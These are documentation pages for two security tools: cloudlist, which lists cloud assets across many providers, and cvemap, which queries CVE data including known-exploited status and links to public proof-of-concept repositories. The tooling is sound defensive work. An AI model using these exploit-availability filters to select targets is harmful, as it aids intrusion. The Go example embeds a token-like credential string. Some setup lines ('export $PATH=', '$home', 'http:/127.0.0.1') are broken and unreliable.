# id is the name defined by user for filtering (optional)
id: staging
# linode_personal_access_token is the personal access token for linode account
linode_personal_access_token: $LINODE_PERSONAL_ACCESS_TOKEN
- provider: fastly # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# fastly_api_key is the personal API token for fastly account
fastly_api_key: $FASTLY_API_KEY
- provider: alibaba # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# alibaba_region_id is the region id of the resources
alibaba_region_id: $ALIBABA_REGION_ID
# alibaba_access_key is the access key ID for alibaba cloud account
alibaba_access_key: $ALIBABA_ACCESS_KEY
# alibaba_access_key_secret is the secret access key for alibaba cloud account
alibaba_access_key_secret: $ALIBABA_ACCESS_KEY_SECRET
- provider: namecheap # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# namecheap_api_key is the api key for namecheap account
namecheap_api_key: $NAMECHEAP_API_KEY
# namecheap_user_name is the username of the namecheap account
namecheap_user_name: $NAMECHEAP_USER_NAME
- provider: terraform # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
#tf_state_file is the location of terraform state file (terraform.tfsate)
tf_state_file: path/to/terraform.tfstate
- provider: hetzner # provider is the name of the provider
# id is the name defined by user for filtering (optional)
id: staging
# auth_token is the is the hetzner authentication token
auth_token: $HETZNER_AUTH_TOKEN
- provider: nomad # provider is the name of the provider
# nomad_url is the url for nomad server
nomad_url: http:/127.0.0.1:4646/
# nomad_ca_file is the path to nomad CA file
# nomad_ca_file: .pem
# nomad_cert_file is the path to nomad Certificate file
# nomad_cert_file: .pem
# nomad_key_file is the path to nomad Certificate Key file
# nomad_key_file: .pem
# nomad_token is the nomad authentication token
# nomad_token:
# nomad_http_auth is the nomad http auth value
# nomad_http_auth:
- provider: consul # provider is the name of the provider
# consul_url is the url for consul server
consul_url: http://localhost:8500/
# consul_ca_file is the path to consul CA file
# consul_ca_file: .pem
# consul_cert_file is the path to consul Certificate file
# consul_cert_file: .pem
# consul_key_file is the path to consul Certificate Key file
# consul_key_file: .pem
# consul_http_token is the consul authentication token
# consul_http_token:
# consul_http_auth is the consul http auth value
# consul_http_auth:
- provider: openstack # provider is the name of the provider
# id is the name of the provider id
id: staging
# identity_endpoint is OpenStack identity endpoint used to authenticate
identity_endpoint: $OS_IDENTITY_ENDPOINT
# domain_name is OpenStack domain name used to authenticate
domain_name: $OS_DOMAIN_NAME
# tenant_name is OpenStack project name
tenant_name: $OS_TENANT_NAME
# username is OpenStack username used to authenticate
username: $OS_USERNAME
# password is OpenStack password used to authenticate
password: $OS_PASSWORD
- provider: kubernetes # provider is the name of the provider
# id is the name of the provider id
id: staging
# kubeconfig_file is the path of kubeconfig file
kubeconfig: path/to/kubeconfig
# context is the context to be used from kubeconfig file
context:
```
# Cloudlist as a library
It's possible to use the library directly in your go programs. The following code snippets outline how to list assets from all or given cloud provider.
```go
package main
import (
"context"
"log"
"github.com/projectdiscovery/cloudlist/pkg/inventory"
"github.com/projectdiscovery/cloudlist/pkg/schema"
)
func main() {
inventory, err := inventory.New(schema.Options{
schema.OptionBlock{"provider": "digitalocean", "digitalocean_token": "ec405badb974fd3d891c9223245f9ab5871c127fce9e632c8dc421edd46d7242"},
})
if err != nil {
log.Fatalf("%s\n", err)
}
for _, provider := range inventory.Providers {
resources, err := provider.Resources(context.Background())
if err != nil {
log.Fatalf("%s\n", err)
}
for _, resource := range resources.Items {
_ = resource // Do something with the resource
}
}
}
```
# Cloudlist Usage
Learn Cloudlist usage including flags and filters
## Access help
Use `cloudlist -h` to display all of the help options.
## Cloudlist options
```yaml
Cloudlist is a tool for listing Assets from multiple cloud providers.
Usage:
./cloudlist [flags]
Flags:
CONFIGURATION:
-config string cloudlist flag config file (default "$HOME/.config/cloudlist/config.yaml")
-pc, -provider-config string provider config file (default "$HOME/.config/cloudlist/provider-config.yaml")
FILTERS:
-p, -provider value display results for given providers (comma-separated) (default linode,fastly,heroku,terraform,digitalocean,consul,cloudflare,hetzner,nomad,do,scw,openstack,alibaba,aws,gcp,namecheap,kubernetes,azure)
-id string[] display results for given ids (comma-separated)
-host display only hostnames in results
-ip display only ips in results
-s, -service value query and display results from given service (comma-separated)) (default cloudfront,gke,domain,compute,ec2,instance,cloud-function,app,eks,consul,droplet,vm,ecs,fastly,alb,s3,lambda,elb,cloud-run,route53,publicip,dns,service,nomad,lightsail,ingress,apigateway)
-ep, -exclude-private exclude private ips in cli output
UPDATE:
-up, -update update cloudlist to latest version
-duc, -disable-update-check disable automatic cloudlist update check
OUTPUT:
-o, -output string output file to write results
-json write output in json format
-version display version of cloudlist
-v display verbose output
-silent display only results in output
```
# Installing cvemap
Learn about how to install and get started with cvemap
To access the cvemap API data you need a ProjectDiscovery Cloud Platform (PDCP) account and API key. Check out [Running](/tools/cvemap/running) for details. Enter the command below in a terminal to install ProjectDiscovery's cvemap using Go.
```bash
go install github.com/projectdiscovery/cvemap/cmd/cvemap@latest
```
## Installation Notes
* cvemap requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo export $PATH=$PATH:$HOME/go/bin >> $home/.bashrc
source $home/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$home/go/bin/cvemap`
# cvemap overview
A structured and easy way to navigate public CVE sources
## What is **cvemap?**
cvemap is a tool that provides a structured and easily navigable way to explore CVEs from the command line.
ProjectDiscovery's cvemap combines data from multiple public sources including:
* NVD (NIST) database of CVEs
* CISA database of CVEs and Known Exploited Vulnerabilities (KEVs)
* Data from HackerOne's CVE Discovery about the most frequently reported CVEs in their system
* Data about EPSS scoring and the mapping to Common Platform Enumeration (CPE)
* Data about public PoCs that might be available on GitHub along with the status of any Nuclei Template for fingerprinting the CVE
Read more about cvemap [on our blog](https://blog.projectdiscovery.io/announcing-cvemap-from-projectdiscovery/)
## Features and capabilities
* CVE Dataset Search & Query
* CVE to EPSS Mapping
* CVE to KEV Mapping
* CVE to CPE Mapping
* CVE to GitHub POCs Mapping
* CVE to Nuclei Template Mapping
* CVE to HackerOne report Mapping
* Customizable Filters on CVE data
* STDIN Input / JSONL Output
## Support
Questions about using cvemap? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running cvemap
Learn about running cvemap with examples including commands and output
For all of the flags and options available for `cvemap` be sure to check out the [Usage](/tools/cvemap/usage) page. On this page we'll share examples running `cvemap` with specific flags and goals
and the output you can expect from each.
*If you have questions, reach out to us through [Help](/help).*
## Prerequisites for cvemap
Before using cvemap, you'll need to get a ProjectDiscovery Cloud Platform (PDCP) account and API key so that you can access the cvemap API data.
Navigate to [https://cloud.projectdiscovery.io/](https://cloud.projectdiscovery.io/) and click “Sign Up” (or “Sign In” if you already have a PDCP account).
Once signed into ProjectDiscovery Cloud Platform, you can navigate to [https://cloud.projectdiscovery.io/?ref=api\_key](https://cloud.projectdiscovery.io/?ref=api_key) to find your API Key.
Use the copy button to copy your API Key - we nee dthis to authenticate your install
To authenticate your install of cvemap, run
```bash
cvemap -auth
```
When prompted, paste the key you obtained above.
## Basic Examples
By default, `cvemap` lists all the known exploited vulnerabilities based CVEs published by [cisa](https://www.cisa.gov/known-exploited-vulnerabilities-catalog).
### List top known exploited vulnerabilities
```bash
$ cvemap -limit 10
______ _____ ____ ___ ____ ____
/ ___/ | / / _ \/ __ \__ \/ __ \/ __ \
/ /__ | |/ / __/ / / / / / /_/ / /_/ /
\___/ |___/\___/_/ /_/ /_/\__,_/ .___/
/_/
projectdiscovery.io
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE | AGE |
|---------------|------|----------|---------|-----------------------|----------|-----|
| CVE-2023-5631 | 5.4 | MEDIUM | 0.00986 | webmail | ❌ | 18 |
| CVE-2023-5217 | 8.8 | HIGH | 0.26047 | libvpx | ❌ | 38 |
| CVE-2023-4966 | 7.5 | HIGH | 0.92267 | netscaler_application | ✅ | 26 |
| CVE-2023-4863 | 8.8 | HIGH | 0.4101 | chrome | ❌ | 54 |
| CVE-2023-46748| 8.8 | HIGH | 0.00607 | | ❌ | 10 |
| CVE-2023-46747| 9.8 | CRITICAL | 0.95304 | | ✅ | 10 |
| CVE-2023-46604| 10 | CRITICAL | 0.01596 | | ✅ | 9 |
| CVE-2023-44487| 7.5 | HIGH | 0.52748 | http | ❌ | 26 |
| CVE-2023-42824| 7.8 | HIGH | 0.00062 | ipados | ❌ | 32 |
| CVE-2023-42793| 9.8 | CRITICAL | 0.97264 | teamcity | ✅ | 47 |
```
### List top CVEs on HackerOne
List top CVEs being reported on hackerone platform using `-h1` or `-hackerone` option.
```bash
$ cvemap -h1
```
```markdown
| CVE | CVSS | SEVERITY | RANK | REPORTS | PRODUCT | TEMPLATE | AGE |
|----------------|------|----------|------|---------|----------------------|----------|------|
| CVE-2020-35946 | 5.4 | MEDIUM | 1 | 304 | all_in_one_seo_pack | ❌ | 1038 |
| CVE-2023-4966 | 7.5 | HIGH | 2 | 54 | netscaler_application| ✅ | 26 |
| CVE-2023-22518 | 9.1 | CRITICAL | 3 | 27 | | ✅ | 5 |
| CVE-2017-15277 | 6.5 | MEDIUM | 4 | 1139 | graphicsmagick | ❌ | 2215 |
| CVE-2023-35813 | 9.8 | CRITICAL | 5 | 54 | experience_commerce | ✅ | 141 |
| CVE-2022-38463 | 6.1 | MEDIUM | 6 | 342 | servicenow | ✅ | 439 |
| CVE-2020-11022 | 6.1 | MEDIUM | 7 | 209 | jquery | ❌ | 1285 |
| CVE-2020-11023 | 6.1 | MEDIUM | 8 | 208 | jquery | ❌ | 1285 |
| CVE-2023-38205 | 7.5 | HIGH | 9 | 162 | coldfusion | ✅ | 52 |
| CVE-2019-11358 | 6.1 | MEDIUM | 10 | 214 | jquery | ❌ | 1660 |
```
cvemap provide multiple ways to query cve data i.e by `product`, `vendor`, `severity`, `cpe`, `assignee`, `cvss-score`, `epss-score`, `age` etc, for example:
### List all CVEs for Confluence
List all the cves published for Atlassian Confluence:
```bash
cvemap -product confluence -l 5
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE |
|---------------|------|----------|---------|------------|----------|
| CVE-2020-4027 | 4.7 | MEDIUM | 0.00105 | confluence | ❌ |
| CVE-2019-3398 | 8.8 | HIGH | 0.97342 | confluence | ✅ |
| CVE-2019-3396 | 9.8 | CRITICAL | 0.97504 | confluence | ✅ |
| CVE-2019-3395 | 9.8 | CRITICAL | 0.07038 | confluence | ❌ |
| CVE-2019-3394 | 8.8 | HIGH | 0.1885 | confluence | ❌ |
```
As default, cvemap display default / limit fields which can be custizmed and controoled using `-field`/ `-f` option, for example:
```bash
$ cvemap -severity critical -field assignee,vstatus,poc -l 5
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE | ASSIGNEE | VSTATUS | POC |
|---------------|------|----------|---------|------------------|----------|------------------------|-------------|-------|
| CVE-2023-5843 | 9 | CRITICAL | 0.00053 | | ❌ | security@wordfence.com | UNCONFIRMED | FALSE |
| CVE-2023-5832 | 9.1 | CRITICAL | 0.00043 | | ❌ | security@huntr.dev | UNCONFIRMED | FALSE |
| CVE-2023-5824 | 9.6 | CRITICAL | 0.00045 | | ❌ | secalert@redhat.com | UNCONFIRMED | FALSE |
| CVE-2023-5820 | 9.6 | CRITICAL | 0.00047 | | ❌ | security@wordfence.com | UNCONFIRMED | FALSE |
| CVE-2023-5807 | 9.8 | CRITICAL | 0.00076 | education_portal | ❌ | cve@usom.gov.tr | CONFIRMED | FALSE |
```
To list cves with matching threshold like, CVSS score or EPSS Score / Percentile, below options can be used:
```bash
$ cvemap -silent -cs '> 7' -es '> 0.00053' -l 5
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE |
|---------------|------|----------|---------|---------------------------------------|----------|
| CVE-2023-5860 | 7.2 | HIGH | 0.00132 | | ❌ |
| CVE-2023-5843 | 9 | CRITICAL | 0.00053 | | ❌ |
| CVE-2023-5807 | 9.8 | CRITICAL | 0.00076 | education_portal | ❌ |
| CVE-2023-5804 | 9.8 | CRITICAL | 0.00063 | nipah_virus_testing_management_system | ❌ |
| CVE-2023-5802 | 8.8 | HIGH | 0.00058 | wp_knowledgebase | ❌ |
```
To filter cves to match with specifc conditions like, cves has public poc or template and in the list of kev, belows options can beused:
```bash
$ cvemap -silent -template=false -poc=true -kev=true -l 5 -f poc,kev
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE | POC | KEV |
|----------------|------|----------|---------|---------|----------|------|------|
| CVE-2023-5631 | 5.4 | MEDIUM | 0.00986 | webmail | ❌ | TRUE | TRUE |
| CVE-2023-5217 | 8.8 | HIGH | 0.26047 | libvpx | ❌ | TRUE | TRUE |
| CVE-2023-4863 | 8.8 | HIGH | 0.4101 | chrome | ❌ | TRUE | TRUE |
| CVE-2023-44487 | 7.5 | HIGH | 0.52748 | http | ❌ | TRUE | TRUE |
| CVE-2023-41993 | 9.8 | CRITICAL | 0.00617 | safari | ❌ | TRUE | TRUE |
```
### Return CVE IDs only
To return only CVE IDs, `-lsi` or `-list-id` flag can be used along with existing filter or search of cvemap.
```bash
cvemap -kev -limit 10 -list-id
CVE-2024-21887
CVE-2024-0519
CVE-2023-7101
CVE-2023-7024
CVE-2023-6549
CVE-2023-6548
CVE-2023-6448
CVE-2023-6345
CVE-2023-5631
CVE-2023-5217
```
### JSON Output
```bash
$ echo CVE-2024-21887 | cvemap -json
```
```json
[
{
"cve_id": "CVE-2024-21887",
"cve_description": "A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.",
"severity": "critical",
"cvss_score": 9.1,
"cvss_metrics": {
"cvss30": {
"score": 9.1,
"vector": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"severity": "critical"
},
"cvss31": {
"score": 9.1,
"vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"severity": "critical"
}
},
"weaknesses": [
{
"cwe_id": "CWE-77",
"cwe_name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')"
}
],
"epss": {
"epss_score": 0.95688,
"epss_percentile": 0.99289
},
"cpe": {
"cpe": "cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*",
"vendor": "ivanti",
"product": "connect_secure"
},
"reference": [
"http://packetstormsecurity.com/files/176668/Ivanti-Connect-Secure-Unauthenticated-Remote-Code-Execution.html"
],
"poc": [
{
"url": "https://github.com/tucommenceapousser/CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-20T19:15:23Z"
},
{
"url": "https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped",
"source": "gh-nomi-sec",
"added_at": "2024-01-19T08:11:31Z"
},
{
"url": "https://github.com/seajaysec/Ivanti-Connect-Around-Scan",
"source": "gh-nomi-sec",
"added_at": "2024-01-19T02:12:11Z"
},
{
"url": "https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-18T13:25:46Z"
},
{
"url": "https://github.com/TheRedDevil1/Check-Vulns-Script",
"source": "gh-nomi-sec",
"added_at": "2024-01-17T10:29:02Z"
},
{
"url": "https://github.com/Chocapikk/CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-16T20:59:38Z"
},
{
"url": "https://github.com/duy-31/CVE-2023-46805_CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-16T19:40:59Z"
},
{
"url": "https://github.com/rxwx/pulse-meter",
"source": "gh-nomi-sec",
"added_at": "2024-01-16T19:19:52Z"
},
{
"url": "https://github.com/oways/ivanti-CVE-2024-21887",
"source": "gh-nomi-sec",
"added_at": "2024-01-14T09:25:56Z"
}
],
"vendor_advisory": "https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US",
"is_template": true,
"nuclei_templates": {
"template_path": "http/cves/2024/CVE-2024-21887.yaml",
"template_url": "https://cloud.projectdiscovery.io/public/CVE-2024-21887",
"created_at": "2024-01-17T02:23:45+05:30",
"updated_at": "2024-01-16T21:14:22Z"
},
"is_exploited": true,
"kev": {
"added_date": "2024-01-10",
"due_date": "2024-01-22"
},
"assignee": "support@hackerone.com",
"published_at": "2024-01-12T17:15:10.017",
"updated_at": "2024-01-22T17:15:09.523",
"hackerone": {
"rank": 6345,
"count": 0
},
"age_in_days": 10,
"vuln_status": "modified",
"is_poc": true,
"is_remote": false,
"is_oss": false,
"vulnerable_cpe": [
"cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r10:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r11:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r11.3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r11.4:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r11.5:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r12:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r12.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r13:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r13.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r14:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r15:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r15.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r16:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r16.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r17:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r17.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r18:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r4:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r4.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r4.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r4.3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r5:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r6:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r7:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r8:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r8.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r8.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r9:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:9.1:r9.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.1:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.1:r6:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.2:-:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.2:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.3:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.4:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.4:r2.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.5:r2.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.6:-:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.6:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:connect_secure:22.6:r2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.0:*:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r10:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r11:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r12:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r13:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r13.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r14:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r15:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r16:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r17:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r18:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r3.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r4:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r4.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r4.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r5:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r6:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r7:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r8:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r8.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r8.2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:9.1:r9:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.1:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.1:r6:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.2:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.2:r3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.3:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.3:r3:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.4:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.4:r2:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.4:r2.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.5:r1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.5:r2.1:*:*:*:*:*:*",
"cpe:2.3:a:ivanti:policy_secure:22.6:r1:*:*:*:*:*:*"
]
}
]
```
## Advanced Filters
You can combine filters with a `-q` query to match multiple filters. For example:
```bash
cvemap -q '"remote code execution" 2023 is_remote:true is_poc:true sort_asc:age_in_days'
```
```markdown
| ID | CVSS | SEVERITY | EPSS | PRODUCT | TEMPLATE | POC | KEV |
|---------------|------|----------|---------|---------|----------|------|------|
| CVE-2023-5631 | 5.4 | MEDIUM | 0.00986 | webmail | ❌ | TRUE | TRUE |
| CVE-2023-5217 | 8.8 | HIGH | 0.26047 | libvpx | ❌ | TRUE | TRUE |
| CVE-2023-4863 | 8.8 | HIGH | 0.4101 | chrome | ❌ | TRUE | TRUE |
| CVE-2023-44487| 7.5 | HIGH | 0.52748 | http | ❌ | TRUE | TRUE |
| CVE-2023-41993| 9.8 | CRITICAL | 0.00617 | safari | ❌ | TRUE | TRUE |
```
You can see the documentation for all available filters below:
### Metadata
Age of the CVE
The assignee for this CVE.
Typically this is an email address such as `security@apache.org` or `cve@mitre.org`
The description of the CVE from the NVD
The CVE ID for a specific CVE such as `CVE-2019-7070`
The CVSS v3.0 score for this CloseEvent. Example: `8.8`
Is the CVE marked as a [Known Exploited Vulnerability (KEV)](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
Is this CVE in open source software with OSS data available?
Is there a Proof of Concept (POC) available for this CVE?
Is this CVE remotely exploitable?
Is there a Nuclei Template available for this CVE?
The URL for the patch for this CVE.
Example: `https://helpx.adobe.com/security/products/acrobat/apsb19-07.html`
The published date and time for this CVE. Example: `2019-05-24T19:29:02.080`
The URL reference for this CVE.
Example: `https://www.zerodayinitiative.com/advisories/ZDI-19-210/`
The CVSS 3.0 severity for this CVE. Example: `severity`
The last date and time that this CVE was updated. Example: `2019-08-21T16:20:31.353`
The URL for the vendor advisory for this CVE.
Example: `vendor_advisory`
The vulnerability status this CVE. Example: `confirmed`
The CPE string for this CVE. Example: `cpe:2.3:a:adobe:acrobat_reader_dc:*:*:*:*:continuous:*:*:*`
### CPE Data
Common Platform Enumeration (CPE) Data
The full Common Platform Enumeration String. Example:
```
cpe:2.3:a:adobe:acrobat_dc:*:*:*:*:classic:*:*:*
```
Common Platform Enumeration framework. Example: `wordpress`
Common Platform Enumeration product. Example: `acrobat_dc`
Common Platform Enumeration vendor. Example: `adobe`
### CVSS Data
Common Vulnerability Scoring System (CVSS) Data
CVSS v2 Score. Example: `9.3`
CVSS v2 severity. Example: `critical`
CVSS v2 vector. Example: `CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C`
CVSS v3.0 Score. Example: `8.8`
CVSS v3.0 severity. Example: `high`
CVSS v3.0 vector. Example: `CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`
CVSS v3.1 Score. Example: `7`
CVSS v3.1 severity. Example: `high`
CVSS v3.1 vector. Example: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`
### EPSS Data
Use After FreeExploit Prediction Scoring System (EPSS) Data
The EPSS percentile. Example: `0.80053`
The EPSS score. Example: `0.00826`
### HackerOne Data
Number of hackerone reports for this CVE. Example: `0`
The hackerone rank for this CVE. Example: `6279`
### KVE Data
Known Exploited Vulnerability (KEV) Data
Date added to the KEV. Example `2022-04-15`
The KEV due Date. Example `2022-05-06`
### Nuclei Template Data
Date and time that the Nuclei Template was created. Example `2020-04-05T23:31:09+05:30`
The GitHub issue for this template. Example `https://github.com/projectdiscovery/nuclei-templates/issues/7549`
The GitHub issue type this template - has it been mentioned or is there a template created? Example `mention` or `template`
The full path for this template. Example `http/cves/2019/CVE-2019-12314.yaml`
The GitHub pull request for this template. Example `https://github.com/projectdiscovery/nuclei-templates/pull/3200`
The public ProjectDiscovery Cloud Platform URL for this template. Example `https://cloud.projectdiscovery.io/public/CVE-2019-12314`
Date and time that the Nuclei Template was last updated. Example `2023-12-29T09:30:44Z`
### Open Source Software (OSS) Data
Date and time that the OSS repository was created. Example `2009-05-21 01:33:45 +0000 UTC`
Description for this software. Example `Mirror of Apache ActiveMQ`
The number of forks for this project. Example `1407`
The primary programming language of this software. Example `Java`
Date and time of the most recent push to this repository. Example `2023-12-12 17:51:19 +0000 UTC`
The number of stars for this project. Example `2221`
The number of subscribers for this repository. Example `200`
The topics for this project. Example `php`
Date and time that the project was last updated. Example `2023-12-29 09:29:55 +0000 UTC`
The public repository URL. Example `"https://github.com/apache/activemq`
### Proof of Concept (POC) Data
Date and time that the POC was added. Example `2019-04-02T12:50:46Z`
The source of the POC. Example `trickest`
The URL of the POC. Example `https://medium.com/@alt3kx/a-reflected-xss-in-print-archive-system-v2015-release-2-6-cve-2019-10685-b60763b7768b`
### Shodan Data
Number of Shodan results relative to this CVE. Example `cpe:\"cpe:2.3:a:adobe:coldfusion\"`
The Shodan query for this CVE. Example `trickest`
### CWE Data
Common Weakness Enumeration (CWE) Data
The CWE ID for this CVE. Example `CWE-416`
The CWE name for this CVE. Example `Use After Free`
# cvemap usage
Learn cvemap usage including flags and filters
## Access help
Use `cvemap - h` to display all help options.
## cvemap help options
```
Flags:
CONFIG:
-auth configure projectdiscovery cloud (pdcp) api key
OPTIONS:
-id string[] cve to list for given id
-v, -vendor string[] cve to list for given vendor
-p, -product string[] cve to list for given product
-eproduct string[] cves to exclude based on products
-s, -severity string[] cve to list for given severity
-cs, -cvss-score string[] cve to list for given cvss score
-c, -cpe string cve to list for given cpe
-es, -epss-score string cve to list for given epss score
-ep, -epss-percentile string[] cve to list for given epss percentile
-age string cve to list published by given age in days
-a, -assignee string[] cve to list for given publisher assignee
-vs, -vstatus value cve to list for given vulnerability status in cli output. supported: modified, rejected, unknown, new, confirmed, unconfirmed
UPDATE:
-up, -update update cvemap to latest version
-duc, -disable-update-check disable automatic cvemap update check
FILTER:
-q, -search string search in cve data
-k, -kev display cves marked as exploitable vulnerabilities by cisa (default true)
-t, -template display cves that has public nuclei templates (default true)
-poc display cves that has public published poc (default true)
-h1, -hackerone display cves reported on hackerone (default true)
